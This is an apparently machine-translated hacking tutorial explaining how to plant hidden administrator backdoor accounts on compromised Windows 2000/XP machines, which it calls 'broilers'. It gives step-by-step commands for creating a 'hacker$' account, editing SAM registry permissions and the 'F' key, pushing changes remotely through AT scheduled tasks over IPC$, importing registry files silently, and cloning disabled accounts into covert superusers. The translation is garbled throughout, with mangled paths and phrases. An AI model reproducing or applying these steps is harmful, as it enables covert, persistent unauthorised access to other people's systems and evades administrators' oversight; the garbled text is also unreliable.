A few days ago, I saw a graphic tutorial to establish a hidden super user, giving me a lot of inspiration, the author only explains how to establish a hidden super user in the local graphical interface. A website saw a graphic tutorial to establish a hidden super user, gave me a lot of inspiration, the author only explains how to establish a hidden super user under the local graphical interface, and the author said that he can't be in the order. Under the line, the hidden super user is built, so I started to explore, when I started, I used the REG.EXE (version 3.0) to import the tool imported into the registry file, but after each import, established Hidden superusers are always unused, and later open the registry view, find that this hidden superuser's default data type is not imported into the registry. Since this data type is a hexadecimal number (such as the default data type of Administrator to 000001F4, the data type in the following example is 00000409) instead of the string type, DWORD type, binary type The data type, REG.EXE cannot be identified, and thus cannot be imported, and the registry editor regedit.exe can be imported with the registry interface, and then I want to regedit.exe is a two-to-average program, it You can run in the Windows interface or run under DOS, and since the graphical interface regedit.exe can import this data type, then it should also be able to import this data type below, and later tried to prove my thoughts. . Below I put me this hidden super user creation method as follows: 1. How to build a hidden super user graphics interface on the graphical interface to apply to the broiler of the local or 3389 terminal service. The author I mentioned above is very good, but it is more complicated, and the PSU.exe (procedure to run as a system user), if you want to upload PSU.exe on the broiler. I said this method will not have to use the PSU.exe. Because Windows 2000 has two registry editors: regedit.exe and regedt32.exe. Regedit.exe and RegedT32.exe in XP are actually a program that modifies the "permission" in right-click "Permissions" when the key value is modified. I think everyone is familiar with regedit.exe, but it is not possible to set permissions to the registry, and the greatest advantage of RegedT32.exe is to set permissions to the registry. NT / 2000 / XP account information is under the hkey_local_machinesamsamsamsam of the registry, but in addition to the system user system users, other users have no right to view the information inside, so I first use regedt32.exe to set the SAM key to "" Full Control Permissions. This allows the information in the SAM key to read and write. Specific steps are as follows: 1. Suppose we are on the broiler of the open terminal with superuser administrator, first create an account in the command line or account manager: Hacker $, here I set up this in the command line Account NET User Hacker $ 1234 / Add 2, enter: regedt32.exe and enter the regedt32.exe in the start / run. 3, click "Permissions" will then pop up the window point Add to add the account when I log in to the security bar. Here I log in as an administrator, so I will add the Administrator to, and set the permissions to "fully control". Here you need to explain: It is best to add the group where your logged in account or account is, do you want to modify the original account or group, otherwise a series of unnecessary issues will be brought. Waiting for hidden super users to build, come here to delete the account you add. 4, click "Start" → "Run" and enter "regedit.exe" Enter, start the registry editor regedit.exe.
Open button: HKEY_LOCAL_MAICHINESAMSAMDOMAINSACCOUSERNAMSAMDOMAINSACCOUSERNAMESHACKER $ "5. Export items Hacker $, 00000409, 000001F4 is Hacker.Reg, 409.REG, 1F4.REG, use notepad to play these exported files, edit the superuser The value of the key "f" under 000001F4 is reproduced, and overrides the key "f" values of the key "f" corresponding to the HACKER $, and then 00000409.REG is combined with the Hacker.reg. 6, execute Net User Hacker in the command line $ / DEL Deletes the user Hacker $ / DEL 7, press F5 to refresh in the regedit.exe window, then play the file - Import the registry file to change the modified Hacker.REG to import the registry 8, At this point, hidden superuser HACKER $ is already built, then turn off regedit.exe. Replace the HKEY_LOCAL_MACHINESAMSAM key to change the HKEY_LOCAL_MACHINESAMSAM key in the regedt32.exe window (just remove the added account administrator). 9, pay: After the hidden superuser is built, you can't see the Hacker $ of the account manager, you can't see the "net user" command in the command line, but after the super user is established, you can't change your password, if you use Net If the user command will change the password of Hacker $, then this hidden superuser will be seen in Account Manager, and cannot be deleted. How to build a hidden super user in the command line will use AT commands, Because the scheduled task generated by AT is running as systematic, it is not used to use the PSU.exe program. In order to be able to use the AT command, the broiler must open the SCHEDULE service, if not open, the tool Netsvc.exe in the stream Or SC.EXE is remotely started, of course, the method can also be, as long as the Schedule service can be started. For command line mode, you can use a variety of connection methods, such as connecting the MSSQL's 1433 port using SQLEXEC, or use Telnet service, as long as With you can get a cmdshell, and you can run the AT command. 1, first find a broiler, as for how to find it is not what I said here. Here, find a super user as administrator, password For the 12345678 broiler, now we start to remotely establish a hidden super user in the command line. (The host in the example is a host in my LAN, I change its IP address to 13. 50.97.238, do not sit on the Internet to avoid harassing the normal IP address. 2, first establish a connection with the broiler, command to: "12345678" / user: "administrator 3, build a user on broiler with the AT command (if the AT service is not started, you can use Xiao Netsvc .exe or sc.exe to stand remotely): AT 13.50.97.238 12:51 C: WinntSystem32Net.exe User Hacker $ 1234 / Add to build this add-to-the-saving user name, because the order is added, the command line With NET USER will not display this user, but you can see this user in Account Manager.
4, the same derived key with the at command HKEY_LOCAL_MACHINEsamsamDomainsaccountusers: at 13.50.97.238 12:55 c: winntregedit.exe / e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers / e is regedit.exe parameters, must end with _LOCAL_MACHINESAMSAMDomainsaccountusers in this key. If necessary, use quotation marks "C: WinntregETUSE / E HACKER.REG HKEY_LOCAL_MACHINESAMSAMDOMDOMAINSACCAVOUSERS". 5. Download the Hacker.reg on broilers to this machine to open with Notepad to edit commands to: Copy 13.50.97.238admin $ system32hacker.reg c: Hacker.Reg modified method graphics boundary, here Not introduced. 6, then copy the editorial Hacker.reg to the broiler on Copy C: Hacker.REG 13.50.97.238Admin $ SYSTEM32HACKER1.REG 7, view broilers: net time 13.50.97.238 then use the AT command to delete the user Hacker $: 13.50.97.238 13:40 NET User Hacker $ / DEL 8, Verify that Hacker $ is deleted: Disconnect with broiler with Net Use 13.50.97.238 / DEL. NET Use 13.50.97.238IPC $ "1234" / user: "Hacker $" is connected to the broiler with the account, and cannot be connected to the description. 9, then establish a connection with broiler: NET use 13.50.97.238iPC $ "12345678" / user: "administrator" to get the broiler time, use the AT command will copy the broiler's Hacker1.REG imported broiler registry: AT 13.50.97.238 13 : 41 C: The parameter / s of WinntregEdit.exe / s Hacker1.Reg Regedit.exe refers to quiet mode. 10. Verify that the Hacker $ is established, the method is the same as above if the Hacker $ is deleted. 11, then verify that the user HACKER $ has read, write, deleted permissions, if you don't worry, you can also verify that you can build other accounts. 12, through 11 can determine the user HACKER $ with superuser privilege, because I originally used the AT command to build it is a normal user, but now there is remote read, write, deleted permissions. Third, if the broiler does not open 3389 terminal service, and I don't want to use the command line, what should I do? In this case, you can also use the interface to establish a hidden super user with broilers. Because regedit.exe, RegedT32.exe has the function of connecting to the network registry, you can use regedt32.exe to set permissions for the registry key of the remote host, with regedit.exe to edit the remote registry. The account manager also has a function of another computer, you can use the Account Manager to create and delete an account for the remote host. Specific step gathering is similar to the above, I don't say much, only its speed is unbearable. But there are two premises here: 1, first use the NET USE broiler ipipc $ "password" / user: "Super User Name" to establish a connection with the remote host to use regedit.exe regedt32.exe and account manager and remote host connection. 2, the remote host must turn on the remote registry service (if not open, you can also open it remotely because you have a superuser password).
4. Establish hidden superusers with disabled accounts: We can use users from broiler to establish hidden hypercar. The method is as follows: 1. If you want to see what users are carefully prohibited, in general, some administrators usually disable guests for security, of course, if they are disabled. Under the graphical interface, it is very easy, as long as you can see a red cross on the disabled account; on the command line, I haven't thought of good ways, I can only use commands in the command line. : "NET User User Name" One one is to see if the user is disabled. 2. Here, we assume that the user Hacker is disabled by the administrator. First, I first clone the program Ca.exe first, I will clone the program ca.exe, and the user Hacker will be cloned into a super user (after clone, the user's Hacker will be automatically activated): ca.exe broiler ip administrator Super User Password Hacher Hacher Password. 3. If you now have a cmdshell, if you use Telnet service or SQLEXEC to connect the shell of MSSQL's default port 1433, you can use the shell, then you only enter the command: Net user Hacker / Active: NO This user Hacker is disabled (at least surface This is the case), of course, you can also replace the user Hacher to other disabled users. 4. At this time, if you look at the user in the Account Manager under the graphical interface, you will find that the user Hacker is disabled, but is it true? You connect the broiler with this disabled user to see if it can be connected? Use the command: NET USER broiler ipipc $ "HACKER Password" / user: "HACKER" to see. I can tell you that after many tests, it can be successful, and it is superuser. 5. What if there is no cmdshell? You can disable the user Hacker; Command Format: AT broiler ip Time NET user HACKER / ACTIVE: NO 6. Principle: I can't say the specific and deep principle, I can only say from the simplest. You first disable the Super User Administrator in the Account Manager in the Graphical Interface, and will definitely pop up a dialogue and prohibit you from to continue to disable superuser administrator, and because in cloning, Hacker "f" in the registry The key is replaced by the Super User Administrator in the "F" key of the registry, so Hacker has the permissions of the superuser, but because Hacker "c" in the registry, "C" is still the original "C" button, Hacker is still Disabled, but its superuser permissions will not be disabled, so users who are disabled can also connect to broilers, and also have superuser permissions. I don't understand, everyone's right and so understand. V. Note: 1. After the hidden super user is established, you can't see this user in the account manager and the command line, but this user exists. 2. After the hidden super user is established, the password cannot be changed again, because once the password is changed, this hidden super user is exposed to the account manager and cannot be deleted.
